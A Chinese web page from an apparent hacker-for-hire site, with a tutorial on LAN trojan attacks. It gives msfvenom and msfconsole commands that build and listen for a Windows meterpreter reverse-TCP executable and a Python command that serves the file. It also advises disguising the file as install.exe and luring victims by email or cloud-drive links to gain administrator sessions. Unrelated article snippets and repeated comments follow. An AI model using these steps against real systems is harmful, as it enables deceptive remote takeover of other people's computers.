当前位置:首页 > 黑客服务 > 正文内容

基于局域网渗透攻击之木马攻击

访客4年前 (2021-04-15)黑客服务434

使用kali生成木马文件,创建一个简易的web服务器,将木马文件伪装成install.exe类型的安装文件,诱使被攻击者点击木马文件,从而getshell。

准备环境

攻击机(kali):192.168.29.130

被攻击机(window server 2008 SP2):192.168.29.135

1、攻击机(kali)使用msfvenom 生成 payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.130 LPORT=4444 -f exe > /xx.exe2.kali攻击机打开msfconsoleuse exploit/multi/handler? //使用攻击模块set payload windows/meterpreter/reverse_tcp? //设置攻击载荷,建立反弹连接set LHOST 192.168.29.130 //设置源IP(攻击机IP)set LPORT 4444? //设置源端口(攻击机未被占用端口)show options ? //查看配置选项(选填,可查看未配置选项)3.实施攻击操作4.kali攻击机将木马文件拷贝到指定目录5.在该目录下面搭建一个简易的web服务器。命令:python -m SimpleHTTPServer 806.查看被攻击者的IP地址详情

7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)8.被攻击者将木马文件下载到本地9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是最高administrator权限原文链接

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/105913.html

分享给朋友:

“基于局域网渗透攻击之木马攻击” 的相关文章

洗米华被抓(沙美华最近怎么了)

据中国电子商务研究中心2021年11月26日23:49:12的最新发布,微博网友@魔鬼管理学 爆料。 平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全网热议! 据悉,洗米华被抓后来我换了俱乐部。。。 1.洗米华出什么事了...

吃鸡鸭的屁股会有病吗?我非常爱吃鸡鸭的屁股,但经常吃会有病吗?另

吃鸡鸭的屁股会有病吗?我非常爱吃鸡鸭的屁股,但经常吃会有病吗?另 鸡鸭的肛门附近组织,布满大大小小的腺体,各类秽物与毒素都在这些腺体囤积;鸡鸭的肛门也有非常高密度的大肠杆菌,所以鸡鸭的屁股不是少吃的问题,而是不能吃.吃得少可能没觉出怎样,多了问题就显出来了.而且鸡鸭屁股的大肠杆菌会随着蛋生出来的时...

家庭用水价格,生活用水价格

约64元,用水价格:生活用水:1点4元/吨,一般三口之家,181-260吨,营业电1元,用的比较少,至来年4月洗热水澡,自来水调价。 污水费0点,8价格元/吨,广州市的居民生活用水从原来的每立方米0点9元,水价也不一样。据此,很难说清楚。居室条件等等,生活用水会比较贵。 自来水费和污水处理费三部分,...

古文化常识(中国古代文化常识大全)

1.中国古代文化常识 文学常识? 四本书:《论语》、《中庸》、《孟子大学》 五经:《诗经》《礼记》《周易》《春秋》 乐府双壁:木兰诗孔雀东南飞 三个字:警告世界,说真话,说真话,唤醒世界,说同样的话 第二枪:第一枪很厉害,第二枪也很厉害 三官:石渠官、潼关官、新安官 三次告别:新婚、老...

小麦价格的走势图 「2019小麦价格最新行情走势」

小麦价格走势行情分析,近期11月20日小麦价格走势,显示今年我国小麦产量略有增加。 5月,尽管近期北京市场面粉价格略有上升.2008年小麦最低收购价格水平,今年国家统计是增产,市场粮源供应格局偏紧/10年度芝加哥期货交易所,粮食企业手中 去那儿看看http。 河南小麦价格2010年12月21日走势参...

铁盖子可以放入高压锅蒸吗?装酱料的铁盖子,外面的涂层有些剥落,好

铁盖子可以放入高压锅蒸吗?装酱料的铁盖子,外面的涂层有些剥落,好 铁盖子可以放入高压锅蒸吗? 装酱料的铁盖子,外面的涂层有些剥落,好象也没锈,可以拿它盖严瓶子入高压锅蒸吗? 绝对不行!既危险又不卫生。盖住的瓶子在高压锅中加热,很容易形成压力差而爆炸;铁在高压锅中的水蒸汽作用下极易变成四氧化三...

评论列表

可难末屿
2年前 (2022-07-05)

攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)8.被攻击者将木马文件下载到本地9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是最高administrator权限原文链接

只影怯慌
2年前 (2022-07-05)

ython -m SimpleHTTPServer 806.查看被攻击者的IP地址详情7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或

双笙颇倔
2年前 (2022-07-05)

ndow server 2008 SP2):192.168.29.1351、攻击机(kali)使用msfvenom 生成 payloadmsfvenom -p windows/meterpreter/reverse_tcp L

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。